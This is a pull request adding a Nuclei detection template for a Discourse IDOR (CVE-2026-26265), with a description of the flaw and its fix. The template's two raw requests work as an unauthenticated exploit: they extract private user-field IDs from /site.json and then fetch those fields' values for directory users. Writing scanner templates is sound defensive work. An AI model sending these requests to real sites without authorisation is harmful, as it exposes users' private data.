### PR TITLE
Add CVE-2026-26265 template

### DIFF
--- a/http/cves/2026/CVE-2026-26265.yaml
+++ b/http/cves/2026/CVE-2026-26265.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-26265
+
+info:
+  name: Discourse - Private User Field Disclosure via Directory Items IDOR
+  author: str4k3r
+  severity: high
+  description: |
+    DirectoryItemsController#index builds its serializer's custom-field map
+    directly from the caller-supplied user_field_ids parameter without
+    checking whether each UserField is public. The visibility restrictions
+    (show_on_profile / show_on_user_card) that Guardian#allowed_user_field_ids
+    enforces elsewhere (e.g. UserCardSerializer) are not applied here, so any
+    unauthenticated visitor can request GET /directory_items.json?period=all&
+    user_field_ids=<id> with the numeric ID of a private field and receive
+    that field's value for every user listed in the directory response. This
+    is fixed by intersecting the requested IDs with UserField.public_fields
+    (or all fields for staff) before building the custom-field map. The
+    field's ID and its show_on_profile/show_on_user_card flags are public
+    themselves (returned by GET /site.json for the signup form), so the
+    private value can be targeted without any prior authentication.
+  reference:
+    - https://github.com/discourse/discourse/security/advisories/GHSA-crxf-p6jm-vpgw
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26265
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-26265
+    cwe-id: CWE-639
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: discourse
+    product: discourse
+  tags: cve,cve2026,discourse,idor,exposure,unauth
+
+http:
+  - raw:
+      - |
+        GET /site.json HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /directory_items.json?period=all&user_field_ids={{uf_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: uf_id
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '"id":(\d+)[^{}]*?"show_on_(?:profile|user_card)":false'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"user_fields":{"{{uf_id}}":'


### PR DESCRIPTION
## Description

This template detects CVE-2026-26265, an unauthenticated Discourse IDOR that can disclose values of private custom user fields through `directory_items.json`.

## Detection logic

- `GET /site.json` extracts a UserField ID whose profile or user-card visibility is disabled.
- `GET /directory_items.json?period=all&user_field_ids=<id>` checks whether the vulnerable directory serializer returns that private field map to an unauthenticated caller.

The requests are read-only. A target must have at least one private UserField and a directory entry for the response to contain the vulnerable field; an empty or differently configured directory is intentionally not reported.

## References

- https://github.com/discourse/discourse/security/advisories/GHSA-crxf-p6jm-vpgw
- https://nvd.nist.gov/vuln/detail/CVE-2026-26265

## Validation

- Native Nuclei validation: passed
- Vulnerable Discourse 2026.1.0: detected 3/3
- Fixed Discourse 2026.1.1: not detected 3/3